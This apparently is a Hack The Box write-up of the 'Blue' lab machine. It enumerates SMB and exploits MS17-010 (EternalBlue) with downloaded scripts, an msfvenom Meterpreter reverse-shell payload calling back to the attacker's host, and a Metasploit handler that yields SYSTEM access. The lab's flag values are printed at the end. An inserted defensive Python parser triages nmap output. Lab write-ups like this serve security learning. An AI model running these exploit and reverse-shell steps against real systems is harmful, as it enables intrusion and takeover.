Blue
About
Blue, while possibly the simplest machine on Hack The Box, demonstrates the severity of the EternalBlue exploit, which has been used in multiple large-scale ransomware and crypto-mining attacks since it was leaked publicly.
Enumeration
Running the script portscan.sh reveals 2 attack vectors, RPC and SMB.
┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ sudo portscan.sh 10.129.142.78
┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ cat PortScan\(10.129.142.78\)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2023-09-26T07:51:36
|_ start_date: 2023-09-26T07:42:32
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-09-26T08:51:34+01:00
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
|_clock-skew: mean: -19m51s, deviation: 34m37s, median: 7s
Exploitation
SMB
I’ll first check if the SMB service is vulnerable by running nmap scripts. From the result, we can see that the target is vulnerable to smb-vuln-ms17-010, which is the infamous SMB exploit EternalBlue.
┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ nmap 10.129.142.78 -p 139,445 --script=smb-vuln-*
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-26 04:03 EDT
Nmap scan report for 10.129.142.78
Host is up (0.13s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-054: false
Nmap done: 1 IP address (1 host up) scanned in 16.99 seconds
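The two nmap runs above leave the vulnerability verdict and the SMB signing state buried in `|`-prefixed host-script text. As an added example that is not part of the original post, the script below parses that output shape (a constructed sample mirrors the scans, with the same whitespace loss as copied terminal text) and turns it into the short triage verdicts a defender would track per host.

```python
import re

# Constructed sample, shaped like the walkthrough's nmap host-script output
# (indentation collapsed the same way, values abridged).
SAMPLE_OUTPUT = """\
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
|_smb-vuln-ms10-054: false
"""

# A script header is a bar, an optional '_' end marker, then a hyphenated
# lowercase NSE script id (smb-vuln-ms17-010, clock-skew, ...). Child keys
# (State:, account_used:, 2:1:0:) never have that shape, so the parser does
# not depend on the indentation that copied output loses.
HEADER = re.compile(r"^\|_?\s*([a-z0-9]+(?:-[a-z0-9]+)+):\s*(.*)$")
CVE = re.compile(r"CVE-\d{4}-\d{4,}")

def parse_host_scripts(text):
    """Return {script_id: [header value, child lines...]} from nmap output."""
    scripts, current = {}, None
    for line in text.splitlines():
        if not line.startswith("|"):
            continue
        m = HEADER.match(line)
        if m:
            current = m.group(1)
            scripts[current] = [m.group(2)] if m.group(2) else []
        elif current is not None:
            scripts[current].append(line.lstrip("|_ ").strip())
    return scripts

def triage(text):
    """Map each finding worth acting on to a short defender-facing verdict."""
    findings = {}
    for sid, body in parse_host_scripts(text).items():
        joined = " ".join(body)
        if sid.startswith("smb-vuln-") and "State: VULNERABLE" in joined:
            findings[sid] = "VULNERABLE " + ",".join(sorted(set(CVE.findall(joined))))
        elif sid == "smb-security-mode" and "message_signing: disabled" in joined:
            findings[sid] = "SMB1 signing disabled"
        elif sid == "smb2-security-mode" and "not required" in joined:
            findings[sid] = "SMB2 signing not required"
    return findings
```

Scripts that report `false` or an NT_STATUS error (ms10-054, ms10-061 above) are deliberately left out of the verdicts, so only actionable items remain.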
In order to exploit this vulnerability, I’ll download exploit scripts from MS17-010.
┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ wget -q https://raw.githubusercontent.com/helviojunior/MS17-010/master/mysmb.py
┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ wget -q https://raw.githubusercontent.com/helviojunior/MS17-010/master/checker.py
┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ wget -q https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py
Contrary to the results from nmap, the script checker.py reports that access to all named pipes is denied.
┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ python2 checker.py 10.129.142.78
Trying to connect to 10.129.142.78:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED
As this might be due to the null session being disabled, I’ll change the script to attempt a guest login instead.
┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ diff checker.py.bak checker.py
14c14
< USERNAME = ''
---
> USERNAME = 'guest'
By running the script checker.py once more with a guest login, I’m able to confirm that the target is indeed vulnerable to MS17-010.
┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ python2 checker.py 10.129.142.78
Trying to connect to 10.129.142.78:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)
Now that we’ve confirmed the vulnerability, I’ll create a reverse shell payload that’ll be used with the exploit script send_and_execute.py.
┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f exe -o exploit.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: exploit.exe
Finally, by modifying and executing the script send_and_execute.py, the reverse shell payload gets uploaded to the target and then gets triggered by a service, which gives me a shell as the user NT AUTHORITY\SYSTEM.
┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ diff send_and_execute.py.bak send_and_execute.py
37c37
< USERNAME = 'guest'
---
> USERNAME = ''
┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ python2 send_and_execute.py 10.129.142.78 exploit.exe
Trying to connect to 10.129.142.78:445
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: browser
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
No transaction struct in leak data
leak failed... try again
CONNECTION: 0xfffffa80019cd410
SESSION: 0xfffff8a0089c4060
FLINK: 0xfffff8a003e84048
InParam: 0xfffff8a003eab15c
MID: 0x4307
unexpected alignment, diff: 0x-27fb8
leak failed... try again
CONNECTION: 0xfffffa80019cd410
SESSION: 0xfffff8a0089c4060
FLINK: 0xfffff8a003ec3088
InParam: 0xfffff8a003ebd15c
MID: 0x4303
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Sending file 9KQXC9.exe...
Opening SVCManager on 10.129.142.78.....
Creating service IYAG.....
Starting service IYAG.....
The NETBIOS connection with the remote host timed out.
Removing service IYAG.....
ServiceExec Error on: 10.129.142.78
nca_s_proto_error
Done
┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Sending stage (175686 bytes) to 10.129.142.78
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.129.142.78:49159) at 2023-09-26 04:24:22 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Post Exploitation
With the shell acquired, I’m able to read the flags user.txt and root.txt.
meterpreter > cat 'C:\Users\haris\Desktop\user.txt'
84d2c82ec907404890f8885e8c4986f2
meterpreter > cat 'C:\Users\Administrator\Desktop\root.txt'
58389873203c25a924be4b506502a55b